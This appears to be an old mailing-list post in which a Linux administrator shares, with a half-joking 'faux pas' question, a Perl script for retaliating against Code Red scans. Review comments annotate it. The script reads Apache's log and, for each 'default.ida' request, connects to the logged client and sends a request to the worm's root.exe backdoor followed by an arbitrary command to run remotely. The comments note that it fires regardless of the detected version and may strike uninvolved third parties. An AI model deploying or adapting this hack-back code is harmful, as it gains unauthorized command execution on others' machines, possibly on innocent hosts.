So creating a FIFO for Apache to write its access log to, and a script like this, would be a faux pas then?...
-Max
#!/usr/bin/perl
#
# Script to retaliate against Code Red Attacks.
# the author is not responsible for how you use this educational script.
#
# NOTE(review): this is a "hack-back" script. It tails Apache's access log
# through a FIFO, and for every request line containing "default.ida" it
# takes the first whitespace-separated field of that line as a peer address
# and opens an outbound TCP connection to it (see &attack). That field is
# whatever the web server logged for the remote client; it is not verified
# here, so the host contacted may be a third party rather than the actual
# source of the scan. The script also runs without "use strict" or
# "use warnings", so the bugs flagged below are silent at runtime.

use Socket;

# Paths are fixed here; nothing is read from @ARGV or %ENV.
$fifo = "/var/log/apache/apache.fifo";
$httplogfile = "/var/log/apache/access.log";
$wormlogfile = "/var/log/apache/codered.log";

# The command you want to run on the compromised machine.
# Left empty in this copy; &attack writes it verbatim to the remote socket.
$win_command = "";

#
# Shouldn't need to do anything below here
#

# Two-argument open with a bareword handle. The mode is a fixed literal, so
# there is no mode injection via the filename here, but the three-argument
# form with a lexical handle is the safe convention.
open (FILE, "<".$fifo) or die "cant open fifo";
while (1){
    # Each iteration of the inner loop handles one log line in $_.
    while (<FILE>){
        &httplog;
        # "." in the pattern is unescaped, so this also matches e.g. "defaultXida".
        if ($_ =~ m/default.ida/){
            # First field of the log line; presumably the client address in
            # Apache's common log format -- depends on the LogFormat in use.
            $ip = ((split " ", $_)[0]);
            &logit;
            # BUG: "=" is assignment, not "eq". The condition is always true,
            # so &attack runs for every matching line regardless of the
            # version &logit detected; the "2/3"-only gating never happens.
            if ($version = "2/3"){ &attack };
        }
    }
}

# Will never get here
close FILE;
exit 0;

sub httplog {
    # create normal http log
    # Appends the current log line ($_) to $httplogfile. The file is opened
    # and closed per line; close is not checked, so write errors are lost.
    open (HTTPLOG, ">>".$httplogfile) or die "cant open http logfile";
    print HTTPLOG $_;
    close HTTPLOG;
}

sub logit {
    # Log compromised machine
    # Appends "<date> - <ip> v<version>]" to $wormlogfile and sets the
    # global $version from the request line in $_. Note the stray "]" in the
    # output has no matching "[".
    open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
    # Fourth field; presumably the "[dd/Mon/yyyy:hh:mm:ss" timestamp in the
    # common log format -- again depends on LogFormat.
    $date = ((split " ", $_)[3]);
    print LOGFILE $date," - ",$ip;
    # BUG: these are two independent statements, not if/elsif/else. When the
    # line contains XXXXXX, $version is set to "2/3" and then immediately
    # overwritten with "?" by the else branch of the second statement, so the
    # "2/3" value can never be logged.
    if ($_ =~ m/XXXXXX/){ $version = "2/3" }
    if ($_ =~ m/NNNNNN/){ $version = "1" } else { $version = "?" };
    print LOGFILE " v",$version,"]\n";
    close LOGFILE;
}

sub attack {
    # Attack compromised machine
    # Opens a TCP connection to port 80 on $ip and sends a request for
    # /scripts/root.exe followed by $win_command. This is the hack-back
    # step: an unsolicited outbound connection, from this host, to an
    # address taken from an untrusted log line.
    # "local" here operates on undeclared package globals, not lexicals.
    local $proto = getprotobyname('tcp');
    # Return value of socket() is not checked.
    socket(osock, PF_INET, SOCK_STREAM, $proto);
    local $sin = sockaddr_in(80, inet_aton($ip));
    # &attack_failed only logs; it does not return from this sub, so on a
    # failed connect the two prints below still run against the unconnected
    # handle (their failures are unchecked). "&name" without parens also
    # passes this sub's current @_ through.
    connect(osock,$sin) or &attack_failed;
    print osock "GET /scripts/root.exe HTTP/1.0 \n";
    print osock $win_command,"\n";
    close (osock);
}

sub attack_failed {
    # If Attack Fails
    # Appends "<ip> - ATTACK FAILED" to $wormlogfile. Reuses the bareword
    # LOGFILE handle that &logit also uses.
    open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
    print LOGFILE $ip," - ATTACK FAILED\n";
    close LOGFILE;
}

-- Max Lock, Senior Linux Systems Administrator, TELE2 Mission Control UK. Linux like wigwam. No windows, no gates, Apache inside.